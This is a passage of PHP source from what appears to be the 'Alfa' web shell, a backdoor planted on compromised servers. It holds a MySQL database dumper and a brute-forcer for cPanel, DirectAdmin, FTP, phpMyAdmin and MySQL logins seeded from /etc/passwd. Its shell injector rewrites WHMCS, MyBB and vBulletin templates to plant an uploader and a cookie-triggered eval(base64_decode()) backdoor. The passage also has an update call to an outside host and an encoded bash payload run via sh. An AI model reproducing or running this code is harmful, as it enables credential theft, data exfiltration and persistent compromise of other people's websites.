1698echo('<div class="header">');
1699AlfaNum(8,9,10);
1700echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
1701$table = array('td1' =>
1702 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1703 'td2' =>
1704 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1705 'td3' =>
1706 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1707 'td4' =>
1708 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1709 'td5' =>
1710 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
1711);
1712create_table($table);
1713echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
1714$username = ($_POST['alfa3']);
1715$password = ($_POST['alfa4']);
1716$dbname = ($_POST['alfa5']);
1717$dfile = ($_POST['alfa6']);
1718$host = ($_POST['alfa7']);
1719if(!empty($dbname)){
1720echo __pre();
1721$msg = "<center>Check this : <font color='red'>".$dfile."</font></center>";
1722if(@mysqli_connect($host,$username,$password,$dbname)){
1723if(strlen(alfaEx("mysqldump"))>0){
1724alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
1725echo($msg);
1726}else{
1727__alert("Error...!");
1728}
1729}else{
1730echo('<center>mysqli_connect : Error!</center>');
1731}
1732}
1733echo('</div>');
1734alfafooter();
1735}
1736function Alfa_DirectAdmin_Cracker($info){
1737if(!$info['mysql'])
1738$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
1739else $url = $info['protocol'].$info['target'].'/phpmyadmin';
1740$curl = curl_init();
1741curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
1742curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
1743curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
1744curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
1745curl_setopt($curl, CURLOPT_HEADER,0);
1746curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1747curl_setopt($curl, CURLOPT_URL,$url);
1748curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
1749if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
1750$result = @curl_exec($curl);
1751$curl_errno = curl_errno($curl);
1752$curl_error = curl_error($curl);
1753if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
1754elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
1755echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1756$info['target'] = $url;
1757CrackerResualt($info);
1758}
1759curl_close($curl);
1760}
1761function Alfa_CP_Cracker($info){
1762$url = $info['protocol'].$info['target'].':'.$info['port'];
1763$curl = curl_init();
1764curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
1765curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
1766curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
1767curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
1768curl_setopt($curl, CURLOPT_HEADER,0);
1769curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
1770curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
1771curl_setopt($curl, CURLOPT_URL, $url);
1772$result = @curl_exec($curl);
1773$curl_errno = curl_errno($curl);
1774$curl_error = curl_error($curl);
1775if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
1776elseif(preg_match('/filemanager/i',$result)){
1777echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1778$info['target'] = $url;
1779CrackerResualt($info);
1780}
1781curl_close($curl);
1782}
1783function Alfa_FTP_Cracker($info){
1784$url = $info['protocol'].$info['target'];
1785$curl = curl_init();
1786curl_setopt($curl, CURLOPT_URL, $url);
1787curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
1788curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1789curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
1790$result = @curl_exec($curl);
1791$curl_errno = curl_errno($curl);
1792$curl_error = curl_error($curl);
1793if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
1794elseif(preg_match('/(\d+):(\d+)/i',$result)){
1795echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1796$info['target'] = $url;
1797CrackerResualt($info);
1798}
1799curl_close($curl);
1800}
1801function Alfa_Mysql_Cracker($info){
1802if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
1803CrackerResualt($info);
1804echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
1805}
1806}
1807function Alfa_FTPC($info){
1808if($con=@ftp_connect($info['target'],$info['port'])){
1809if($con){
1810$login=@ftp_login($con,$info['username'],$info['password']);
1811if($login){CrackerResualt($info);}}}
1812@ftp_close($con);
1813}
1814function CrackerResualt($info){
1815$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
1816$c = @fopen($info['fcrack'],'a+');
1817@fwrite($c, $res);
1818@fclose($c);
1819}
1820function Alfa_Call_Function_Cracker($method,$info){
1821switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
1822}
1823function alfaCrackers(){
1824alfahead();
1825AlfaNum(9,10);
1826echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
1827foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
1828echo '</select> Protocol: <select id="protocol" name="protocol">';
1829foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
1830echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
1831Port: <input id="port" type="text" name="port" value="2083">
1832<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
1833<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
1834  <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
1835Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
1836<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
1837$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
1838$port = $_POST['alfa2'];
1839$usernames= $_POST['alfa3'];
1840$passwords = $_POST['alfa4'];
1841$fcrack = $_POST['alfa5'];
1842$cracking = $_POST['alfa6'];
1843$protocol = $_POST['alfa7'];
1844$loginpanel = $_POST['alfa8'];
1845$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
1846if($cracking=='start'){
1847echo __pre();
1848$exuser = explode("\n",$usernames);
1849$expw = explode("\n",$passwords);
1850foreach($exuser as $user){
1851foreach($expw as $pw){
1852$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
1853Alfa_Call_Function_Cracker($loginpanel,$array);
1854}
1855}
1856echo '<br><font color="red">Attack Finished...</font>';
1857}
1858echo '</div>';
1859alfafooter();
1860}
1861function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
1862function alfaShellInjectors(){
1863alfahead();
1864echo '<div class=header>';
1865AlfaNum(11);
1866echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
1867$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
1868if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
1869AlfaNum();
1870echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
1871$table = array('td1' =>
1872 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
1873 'td2' =>
1874 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
1875 'td3' =>
1876 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
1877 'td4' =>
1878 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
1879 'td5' =>
1880 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
1881);
1882create_table($table);
1883echo $selector;
1884echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
1885if(isset($_POST['alfa6'])) {
1886$dbu = $_POST['alfa6'];
1887$dbn = $_POST['alfa7'];
1888$dbp = $_POST['alfa8'];
1889$dbh = $_POST['alfa9'];
1890$path = $_POST['alfa10'];
1891$method = $_POST['alfa4'];
1892$index = "{php}".ALFA_UPLOADER.";{/php}";
1893$newin = str_replace("'","\'",$index);
1894$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
1895if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
1896if(filter_var($path,FILTER_VALIDATE_URL)){
1897$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_connect_error());
1898$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
1899$soleGet = mysqli_fetch_assoc($soleSave);
1900$tempSave1 = $soleGet['message'];
1901$tempSave = str_replace("'","\'",$tempSave1);
1902mysqli_query($conn,"UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die (mysqli_error($conn));
1903$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
1904$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
1905$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
1906$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
1907if(function_exists('curl_version') && $method == 'auto'){
1908$AlfaSole = new AlfaCURL(true);
1909$saveurl = $AlfaSole->Send($path."/pwreset.php");
1910$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
1911$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
1912$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
1913$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
1914__alert("shell injectet...");
1915$ff= 'http://'.$path."/solevisible.php";
1916output($ff);}else{
1917echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
1918}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
1919AlfaNum(1,2,3,5);
1920echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
1921";
1922$table = array('td1' =>
1923 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
1924 'td2' =>
1925 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
1926 'td3' =>
1927 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
1928 'td4' =>
1929 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
1930 'td5' =>
1931 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
1932);
1933create_table($table);
1934echo $selector;
1935echo "<p><input type=submit value=' '></p></form></center></center>";
1936if(isset($_POST['alfa6'])) {
1937$dbu = $_POST['alfa6'];
1938$dbn = $_POST['alfa7'];
1939$dbp = $_POST['alfa8'];
1940$dbh = $_POST['alfa9'];
1941$prefix = $_POST['alfa10'];
1942$method = $_POST['alfa4'];
1943$shellCode = "{\${".ALFA_UPLOADER."}}";
1944$newinshell = str_replace("'","\'",$shellCode);
1945if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
1946$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
1947$inject = "select template from {$prefix}templates where title= 'calendar'";
1948$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
1949$GetTemp = mysqli_fetch_assoc($result);
1950$saveDate = $GetTemp['template'];
1951$repsave = str_replace($shellCode,"",$saveDate);
1952$repsave = str_replace("'","\'",$repsave);
1953$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
1954$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
1955$geturl = "select value from {$prefix}settings where name= 'bburl'";
1956$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
1957$rowb = mysqli_fetch_assoc($findurl);
1958$furl = $rowb['value'];
1959$realurl = parse_url($furl,PHP_URL_HOST);
1960$realpath = parse_url($furl,PHP_URL_PATH);
1961$res = false;
1962$AlfaCurl = new AlfaCURL();
1963if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
1964if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
1965@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
1966@fputs($fsock, "HOST: $realurl\r\n");
1967@fputs($fsock, "Connection: close\r\n\r\n");
1968$check = fgets($fsock);
1969if(preg_match("/200 OK/i",$check)){
1970$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
1971$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
1972@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
1973$AlfaCurl->Send($realurl.$realpath."/calendar.php");
1974$res = true;
1975}
1976if($res){
1977$ff = 'http://'.$realurl.$realpath."/solevisible.php";
1978output($ff);
1979}else{
1980$ff = 'http://'.$realurl.$realpath."/calendar.php";
1981$fff = 'http://'.$realurl.$realpath."/solevisible.php";
1982echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
1983}}}}
1984if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
1985AlfaNum(1,2,7,9,10);
1986echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
1987$table = array('td1' =>
1988 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
1989 'td2' =>
1990 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
1991 'td3' =>
1992 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
1993 'td4' =>
1994 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
1995 'td5' =>
1996 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
1997);
1998create_table($table);
1999echo $selector;
2000echo '<p><input type="submit" value=" " /></p></form></center>';
2001if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
2002$method = $_POST['alfa8'];
2003$faq_name = "faq";
2004$faq_file = "/faq.php";
2005$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
2006$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_connect_error());
2007$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
2008$recivedata = @mysqli_query($conn,$rec);
2009$getd = @mysqli_fetch_assoc($recivedata);
2010$savetoass = $getd['template'];
2011if(empty($savetoass)){
2012 $faq_name = "header";
2013 $faq_file = "/";
2014 $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='".$faq_name."'";
2015 $recivedata = @mysqli_query($conn,$rec);
2016 $getd = @mysqli_fetch_assoc($recivedata);
2017 $savetoass = $getd['template'];
2018 $code = ALFA_UPLOADER.";";
2019}
2020$code = str_replace("'","\'",$code);
2021$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='".$faq_name."'";
2022$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
2023$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
2024$getval = @mysqli_fetch_assoc($geturl);
2025$saveval = $getval['value'];
2026if($faq_name == "header"){
2027 if(substr($saveval, -5, 5) == "/core"){
2028 $saveval = substr($saveval, 0, -5);
2029 }
2030}
2031$realurl = parse_url($saveval,PHP_URL_HOST);
2032$realpath = parse_url($saveval,PHP_URL_PATH);
2033$res = false;
2034$AlfaCurl = new AlfaCURL();
2035if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
2036if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2037@fputs($fsock, "GET $realpath.$faq_file HTTP/1.1\r\n");
2038@fputs($fsock, "HOST: $realurl\r\n");
2039@fputs($fsock, "Connection: close\r\n\r\n");
2040$check = fgets($fsock);
2041if(preg_match("/200 OK/i",$check)){
2042$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
2043$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2044$res = true;
2045}
2046@fclose($fsock);
2047}
2048}elseif(function_exists('curl_version') && $method == 'auto'){
2049$AlfaCurl->Send($realurl.$realpath.$faq_file);
2050$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".mysqli_real_escape_string($conn,$savetoass)."' WHERE title ='".$faq_name."'";
2051$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2052$res = true;
2053}
2054if($res){
2055$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2056output($ff);
2057}else{
2058$ff = 'http://'.$realurl.$realpath.$faq_file;
2059$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2060echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
2061echo '</div>';
2062alfafooter();
2063}
2064function alfacheckfiletype(){
2065 $path = $_POST['path'];
2066 $arg = $_POST['arg'];
2067 if(@is_file($path.'/'.$arg)){
2068 echo("file");
2069 }else{
2070 echo("dir");
2071 }
2072}
2073function alfacheckupdate(){
2074 if($GLOBALS["DB_NAME"]["cgi_api"]){
2075 if(!isset($_COOKIE["alfacgiapi_mode"])&&!isset($_COOKIE["alfacgiapi"])){
2076 _alfa_cgicmd("whoami","perl",true);
2077 if(strlen(alfaEx("whoami",false,$cgi))>0){
2078 __alfa_set_cookie("alfa_canruncmd", "true");
2079 }
2080 }
2081 }
2082 if(function_exists("curl_version")){
2083 $update = new AlfaCURL();
2084 $json = $update->Send("http://solevisible.com/update.json?ver=".__ALFA_VERSION__);
2085 $json = @json_decode($json,true);
2086 $data = array();
2087 if($json){
2088 if(!isset($_COOKIE['alfa_checkupdate']) && !empty($json["type"])){
2089 if($json["type"] == "update"){
2090 if(__ALFA_VERSION__ != $json['version'] || __ALFA_UPDATE__ != $json['version_number']){
2091 @setcookie("alfa_checkupdate", "1", time()+86400);
2092 $data["content"] = '<div class="update-holder">'.$json["content"].'</div>';
2093 }
2094 }
2095 }
2096 if(isset($json["ads"]) && !empty($json["ads"])){
2097 $data["content"] .= $json["ads"];
2098 }
2099 if(isset($json["copyright"]) && !empty($json["copyright"])){
2100 $data["copyright"] = $json["copyright"];
2101 }
2102 if(isset($json["solevisible"]) && !empty($json["solevisible"])){
2103 $data["solevisible"] = $json["solevisible"];
2104 }
2105 if(isset($json["code_name"]) && !empty($json["code_name"])){
2106 $data["code_name"] = $json["code_name"];
2107 $data["version_number"] = __ALFA_VERSION__;
2108 }
2109 if(isset($json["market"]) && !empty($json["market"])){
2110 $data["market"] = $json["market"];
2111 }
2112 echo @json_encode($data);
2113 }
2114 }
2115}
2116function alfaWriteTocgiapi($name, $source){
2117 $temp = "";
2118 $not_api = array("basedir.alfa", "getdir.alfa", "getheader.alfa");
2119 if(in_array($name, $not_api)){
2120 $temp = ALFA_TEMPDIR;
2121 if($temp){
2122 @chdir($temp);
2123 }
2124 }else{
2125 alfaCreateParentFolder();
2126 @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
2127 }
2128 @mkdir('alfacgiapi',0755);
2129 __write_file("alfacgiapi/".$name, __get_resource($source));
2130 @chmod("alfacgiapi/".$name, 0755);
2131 return $temp;
2132}
2133function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
2134function alfaupdateheader(){
2135 if(!isset($_COOKIE["updateheader_data"])){
2136 $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
2137 $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
2138 $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);
2139 $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);
2140 if(@is_array(@json_decode($data,true))){
2141 __alfa_set_cookie("updateheader_data", $data);
2142 echo $data;
2143 }
2144 }else{
2145 echo $_COOKIE["updateheader_data"];
2146 }
2147}
2148function alfassiShell(){
2149alfahead();
2150echo '<div class=header>';
2151alfaCreateParentFolder();
2152@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
2153@mkdir('alfa_shtml',0755);
2154@chdir('alfa_shtml');
2155alfacgihtaccess('shtml');
2156$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4